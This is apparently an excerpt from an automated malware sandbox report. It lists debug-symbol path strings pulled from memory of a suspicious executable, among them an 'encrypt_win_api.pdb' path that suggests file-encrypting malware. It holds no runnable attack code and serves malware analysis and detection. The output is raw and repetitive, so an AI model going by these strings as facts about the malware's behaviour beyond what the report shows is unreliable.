          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\e\\oC source: 66d5df681876c_file010924.exe, 00000007.00000003.1419014721.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1419063280.00000000006B3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\*8Ym9W source: 66d5df681876c_file010924.exe, 00000007.00000003.1874172143.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1876173870.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841010847.00000000034C1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1863595092.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1857497513.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896115774.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897648882.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781668191.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940486710.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896183215.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925928920.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840831198.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927479762.00000000034BC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856785304.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862923885.00000000034AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\* source: 66d5df681876c_file010924.exe, 00000007.00000003.1407550736.0000000003018000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\AC\D@y source: 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003E58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1923844523.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1503154342.0000000003586000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503857906.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781705167.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449688125.000000000358E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503665626.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781558146.0000000003578000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1781606614.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841010847.00000000034C1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840831198.00000000034A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862345075.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\X- source: 66d5df681876c_file010924.exe, 00000007.00000003.1841566342.000000000355A000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842024201.000000000355B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840659359.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842496402.0000000003581000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841761179.000000000355B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840136245.0000000003515000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842318558.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1782551785.00000000034A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1842736440.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1928412478.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896722726.0000000003C68000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898391125.0000000003CB8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897980412.0000000003C87000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*^R source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1782075407.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841048090.0000000003630000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782415161.0000000003614000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782250781.00000000035DB000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781335365.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782358386.0000000003608000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782627575.000000000362C000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840928675.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842632171.0000000003633000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840031953.00000000035DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 66d5df681876c_file010924.exe, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Etx source: 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.q source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\R\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 66d5df681876c_file010924.exe, 00000007.00000003.1354753858.0000000003440000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: ntdesk\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1449434066.00000000034FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1449688125.000000000358E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 66d5df681876c_file010924.exe, 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\06\n [<k source: 66d5df681876c_file010924.exe, 00000007.00000003.1863411961.0000000003005000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\9 source: 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003E58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\` source: 66d5df681876c_file010924.exe, 00000007.00000003.1856829390.0000000003638000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1875087794.0000000003640000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841048090.0000000003630000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873658789.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873863860.00000000035DE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856302765.00000000035E6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856700609.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840928675.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842632171.0000000003633000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874583286.000000000361A000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840031953.00000000035DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1926339843.0000000003AB6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927721951.00000000038AF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940441236.000000000389F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\d source: 66d5df681876c_file010924.exe, 00000007.00000003.1941224453.00000000035D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1503426204.0000000003016000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414687237.0000000003052000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449970090.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503544842.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414539784.0000000003039000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414572819.000000000304A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1841678052.00000000037B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Uz source: 66d5df681876c_file010924.exe, 00000007.00000003.1895097511.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927368986.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925557469.00000000038E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ules\; source: 66d5df681876c_file010924.exe, 00000007.00000003.1450042666.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449434066.00000000034FF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503598195.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1645701345.0000000003543000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503233619.000000000350C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\o source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\:\UML source: 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862345075.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\<9 source: 66d5df681876c_file010924.exe, 00000007.00000003.1863411961.0000000003005000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1940798434.00000000035F6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\:\Users8 source: 66d5df681876c_file010924.exe, 00000007.00000003.1920725014.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1920436665.00000000039A8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ing source: 66d5df681876c_file010924.exe, 00000007.00000003.1414632632.0000000003014000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503426204.0000000003016000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414598195.0000000003009000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503810721.0000000003027000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1895097511.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927368986.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925557469.00000000038E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Data\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1856221697.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856521488.0000000003519000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862785834.000000000352D000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1407734481.0000000002FEF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1407618047.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414663073.0000000002FF1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1941309860.00000000037B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\f source: 66d5df681876c_file010924.exe, 00000007.00000003.1503888368.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781997057.0000000002FDA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781792022.0000000002FD5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1840619727.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781705167.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781997057.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840136245.0000000003515000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781558146.0000000003578000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782471207.0000000003010000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781792022.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\40m source: 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926339843.0000000003AB6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\.watzz/ source: 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\X source: 66d5df681876c_file010924.exe, 00000007.00000003.1842736440.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862690814.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1941365593.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\n\. source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927721951.00000000038AF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940441236.000000000389F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: 66d5df681876c_file010924.exe, 00000007.00000003.1876772587.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\) source: 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1876772587.0000000003BB1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926173964.0000000003525000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925928920.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003BD0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1856221697.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856521488.0000000003519000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862785834.000000000352D000.00000004.00000020.00020000.00000000.sdmp
